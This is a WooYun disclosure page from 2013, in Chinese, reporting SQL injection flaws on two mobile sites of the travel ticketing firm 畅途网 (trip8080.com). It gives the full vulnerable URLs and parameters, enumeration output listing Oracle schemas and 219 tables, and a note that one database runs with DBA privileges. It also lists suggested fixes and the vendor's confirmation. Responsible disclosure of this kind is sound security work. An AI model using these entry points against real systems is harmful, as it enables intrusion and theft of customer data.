当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021035

漏洞标题:畅途网多处注射-数据大大的多

相关厂商:畅途网

漏洞作者: 小胖子

提交时间:2013-03-31 20:58

修复时间:2013-05-15 20:58

公开时间:2013-05-15 20:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-03-31: 细节已通知厂商并且等待厂商处理中
2013-03-31: 厂商已经确认,细节仅向厂商公开
2013-04-10: 细节向核心白帽子及相关领域专家公开
2013-04-20: 细节向普通白帽子公开
2013-04-30: 细节向实习白帽子公开
2013-05-15: 细节向公众公开

简要描述:

这下数据就多得吓人了,速度修复,黑产牛们手下留情。还有sa。

详细说明:

wap站也不能放松警惕啊!
注入点1:http://100wap.trip8080.com/tbDetail.htm?currentPage=1&hotFlag=&stCity=%E5%8E%A6%E9%97%A8%E5%B8%82&endCity=%E6%B7%B1%E5%9C%B3%E5%B8%82&stCityId=70790&endCityId=46&pkTimetableId=1046556
注入参数:pkTimetableId(其他参数也可能) 数据库类型:oracle
22个数据库,貌似主站也一起被殃及到了啊。

available databases [22]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PROD
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] TTS_CMS
[*] TTS_COA
[*] TTS_ECM
[*] TTS_EXM
[*] TTS_FND
[*] TTS_HR
[*] WMSYS
[*] XDB


当前注入点当前库:PROD 219个表,看到user什么的好开心。

Database: PROD
[219 tables]
+--------------------------------+
| CMS_ADVICES_ANS_LOG            |
| CMS_ADVICE_ANS_LOG             |
| CMS_ADVT_SHOWS                 |
| CMS_ADV_STATISTICS_DAILY       |
| CMS_CACHE_AREAS                |
| CMS_CACHE_DATASOURCE_METHODS   |
| CMS_CACHE_DATASOURCE_TYPES     |
| CMS_CACHE_DATA_TYPES           |
| CMS_CACHE_SERVICE_TYPES        |
| CMS_CTQCP_STATUS               |
| CMS_IPS_TB3_SIN                |
| CMS_IPS_UPDATE                 |
| CMS_IP_INDEX                   |
| CMS_MESSAGE_CLASSES            |
| CMS_MESSAGE_PIPES              |
| CMS_MESSAGE_RULE_CODES         |
| CMS_MESSAGE_SEND_CLASSES       |
| CMS_MSG_CLASSES                |
| CMS_MSG_TYPES                  |
| CMS_NEWS_STATUS                |
| CMS_NOTICE_CLASSES             |
| CMS_NOTICE_RANGES              |
| CMS_PAGE_INLINE_CODES          |
| CMS_PAY_STATUS                 |
| CMS_RECYCLE_TYPE               |
| CMS_SENSITIVE_CLASSES          |
| CMS_TASK_CLASS                 |
| CMS_TAST_PRIOR_GRADES          |
| CMS_TAST_PROCESS_STATUS        |
| CMS_WEATHER_PROVIDERS          |
| COA_BUSY_CLASSES               |
| COA_CUSTOMER_SUBJECTS          |
| COA_DEFAULT_CONTENTS           |
| COA_FEE_ITEMS                  |
| COA_ORG_BUSYS                  |
| COA_PAY_PLACES                 |
| COA_SMS_COMMAND_CLASS          |
| COA_SMS_RECE_STATUS            |
| COA_SMS_SEND_PRIOR             |
| COA_SMS_SEND_STATUS            |
| ECM_ADVICE_LEVEL               |
| ECM_ADVICE_TYPE_DETAILS        |
| ECM_AGENTS_COPY                |
| ECM_AGENT_BALANCE_LOGS         |
| ECM_AGENT_EMPLOYEES_HIS        |
| ECM_AGENT_MONEY_LOAD           |
| ECM_AGENT_SUBJECTS             |
| ECM_AGENT_TYPES                |
| ECM_AGENT_WSIPS                |
| ECM_ARAP_CLASSES               |
| ECM_ARAP_CLASS_DETAILS         |
| ECM_ARAP_STATUSES              |
| ECM_BANK_CLASSES               |
| ECM_BLOOD_TYPES                |
| ECM_BOOK_NODES                 |
| ECM_BORN_ANIMALS               |
| ECM_BUSINESS_TYPES             |
| ECM_BUSY_CODE                  |
| ECM_CACHE_DEL_STATUS           |
| ECM_CITIES_LEVEL4              |
| ECM_CITIES_OLD                 |
| ECM_CITY_ATTR                  |
| ECM_CITY_SCH_PLANS1            |
| ECM_CITY_SCH_PLANS2            |
| ECM_CITY_SMS_SOURCE            |
| ECM_COMING_CITY                |
| ECM_CONSTELLATIONS             |
| ECM_COUPON_BUSYS               |
| ECM_COUPON_PROCESSES           |
| ECM_COUPON_SOURCES             |
| ECM_COUPON_STATUS              |
| ECM_COUPON_SUBJECTS            |
| ECM_COUPON_USES                |
| ECM_CRITICAL_RULES             |
| ECM_DATALOAD_CLASSES           |
| ECM_DATALOAD_STATUSES          |
| ECM_DOCUMENT_TYPES             |
| ECM_EDU_LEVELS                 |
| ECM_ELEMENT_COLUMNS            |
| ECM_EXPRESS_ACCOUNT_SUBJECTS   |
| ECM_EXPRESS_BALANCES_LOG       |
| ECM_EXPRESS_EMPLOYEES_HIS      |
| ECM_EXP_STATUS                 |
| ECM_FORMULA_FACTOR_CLASSES     |
| ECM_FUTTS034_GTAB              |
| ECM_FUTTS049S_GTAB             |
| ECM_FUTTS049_GTAB              |
| ECM_FUTTS050_GTAB              |
| ECM_FUTTS053_GTAB              |
| ECM_GETSCH_TYPES               |
| ECM_HOTROUTE_AREA              |
| ECM_HOTSTART_ORDER_MV          |
| ECM_HOTSTART_TIMETABLE_MV      |
| ECM_INTERFACE_DATA_DEAL        |
| ECM_INTERFACE_REFLECT_MODELS   |
| ECM_INTERFACE_STATION_MODELS   |
| ECM_JOBS                       |
| ECM_MAPS                       |
| ECM_MAP_TYPES                  |
| ECM_MATCH_DETAILS              |
| ECM_MEMBER_ACCOUNT_SUBJECTS    |
| ECM_MEMBER_ACTIONS_BAK         |
| ECM_MEMBER_ACTION_AWARDS       |
| ECM_MEMBER_ACTION_CLASSES      |
| ECM_MEMBER_ADDRESSES_BEIFEN    |
| ECM_MEMBER_EXP_SUBJECTS        |
| ECM_MEMBER_IDENTITIES          |
| ECM_MEMBER_INT_SUBJECTS        |
| ECM_MEMBER_MEDIA               |
| ECM_MEMBER_OC_PARA             |
| ECM_MEMBER_SOURCES             |
| ECM_MEMBER_TYPES               |
| ECM_OPEN_PAYS                  |
| ECM_ORDER_BOOK_REMARKS         |
| ECM_ORDER_FAIL_TYPES           |
| ECM_ORDER_INTERFACES           |
| ECM_ORDER_REV_ELEMENTS         |
| ECM_ORDER_SOURCES              |
| ECM_ORDER_STATUS               |
| ECM_PAGE_LOCATION              |
| ECM_PARTNER_TYPES              |
| ECM_PAYCODE_GROUP_ZJ           |
| ECM_PAY_ACTION_STATUS          |
| ECM_PAY_CLASSES                |
| ECM_PAY_STATUS                 |
| ECM_PICTURE_SOURCE_TYPES       |
| ECM_POOL_TICKET_STATUSES       |
| ECM_PRE_TICKET                 |
| ECM_PROMPT_CLASSES             |
| ECM_PROVINCES_OLD              |
| ECM_PROVINCE_TYPES             |
| ECM_PRO_VOUCHER_MODEL          |
| ECM_PRO_VOUCHER_PLACE          |
| ECM_REMARKS                    |
| ECM_RESP_CLASSES               |
| ECM_REV_ELEMENT_RULES          |
| ECM_ROUTE_LINES_OLD            |
| ECM_SEND_MODELS                |
| ECM_SETTLE_STATUSES            |
| ECM_STATIONS_OLD               |
| ECM_STATION_BAK                |
| ECM_STATION_CACHE_RATES        |
| ECM_STATION_NEW                |
| ECM_STATION_STATES             |
| ECM_STATION_UPDATE             |
| ECM_TICKET_APPLY_STATUS        |
| ECM_TICKET_APPLY_STATUSES      |
| ECM_TICKET_ORDER_DETAILS_HIS   |
| ECM_TICKET_ORDER_DETAILS_LOGS  |
| ECM_TICKET_ORDER_PREMIUM_LOGS1 |
| ECM_TICKET_ORDER_TTS           |
| ECM_TICKET_POOLS_GTAB          |
| ECM_TICKET_POOLS_GTAB1         |
| ECM_TICKET_STATUS              |
| ECM_TIMETABLES_OLD             |
| ECM_TIMETABLE_DEFINES_T        |
| ECM_TTS201_GTAB                |
| ECM_TTSZCL004                  |
| ECM_USER_SATISFACTIONS         |
| ECM_WANGTTS022                 |
| ECM_ZGT_ROUTE_LINES            |
| EXM_APPRE_REQUEST_SUM_OLD      |
| EXM_APPRE_STATIONS_OLD         |
| EXM_APPRE_SUM_OLD              |
| EXM_APPRE_TIMETABLES_OLD       |
| EXPRESS_AGENT_OLDID_NEWID      |
| FND_APPLICATION_DISPLAYS       |
| FND_BCODE_SIGNS                |
| FND_BCODE_SPLITS               |
| FND_BLN_CLASSES                |
| FND_CHANNEL_CLASS              |
| FND_CHART_TYPES                |
| FND_INTERFACE_CLASS            |
| FND_INTERFACE_USERS            |
| FND_MAP_LINE_MODELS            |
| FND_MAP_MODELS                 |
| FND_MATH_OPERATORS             |
| FND_METHOD_CLASSES             |
| FND_MSG_TYPES                  |
| FND_OPERATE_POWERS             |
| FND_OPTION_ATTRIBUTES          |
| FND_ORACLE_DATA_TYPES          |
| FND_ORA_JAVA_DATATYPES         |
| FND_ORA_SQLERRS                |
| FND_ORG_BUSY_CLASSES           |
| FND_ORG_CHANGES                |
| FND_ORG_CLASSES                |
| FND_PARA_VAL_TYPES             |
| FND_PLAN_QUENS                 |
| FND_REGISTER_SOURCES           |
| FND_REPROT_STATUSES            |
| FND_ROLES                      |
| FND_ROLE_FUNC                  |
| FND_ROLE_USERS                 |
| FND_SERVICE_PURPOSES           |
| FND_SMS_CLASS                  |
| FND_TABLE_CLASSES              |
| FND_TASK_SOURCE_TYPES          |
| FND_TIME_UOMS                  |
| FND_USER_GRADE                 |
| FND_USER_SET_LISTS             |
| FND_USER_SOURCES               |
| FND_WARN_MODELS                |
| FND_WARN_PRODUCE_TYPES         |
| FND_WEEK_DAYS                  |
| FND_WORKFLOW_STATUSES          |
| GET_DATE                       |
| HR_EMP_LEVELS                  |
| INTERFACE_CLASS                |
| NEW_OLD_OPERATOR               |
| REPLACE_STATIONS               |
| ROUTE_TIMETABLES_CTQCP         |
| SCHEDULE_PLAN_CLASSES          |
| STS_AUDIT_STATUS               |
| TIMETABLES_JS                  |
| T_ECM_STATION_INTERFACES       |
| T_ECM_STATION_MAPS             |
| T_TEST                         |
| WZ_USERS                       |
+--------------------------------+


其他不一一列举。
注入点2:http://3g.trip8080.com/chepiao/querySch.htm?stCityInfo=%25E5%258C%2597%25E4%25BA%25AC%25E5%25B8%2582%2C1&carryStaId=-1&busStopId=310000&busStopName=%25E4%25B8%258A%25E6%25B5%25B7&planDate=20130331&timeSta=00%3A00-24%3A00-d
注入参数:carryStaId(其他参数也可能) 数据库类型:Microsoft SQL Server 2008
DBA权限(这个太危险)。
数据不一一读取了,对你们不好,对我也不好,适可而止,及时报送修复。

QQ截图20130331205335.jpg


漏洞证明:

见详细说明。

修复方案:

1:注入点2数据库降权,sa权限成何体统,过滤。
2:注入点1过滤啊过滤,wap站也不能疏忽。
3:后台地址修改吧。
4:rank必须20有木有!!!礼物什么的有木有!!!!

版权声明:转载请注明来源 小胖子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-03-31 21:55

厂商回复:

非常感谢

最新状态:

暂无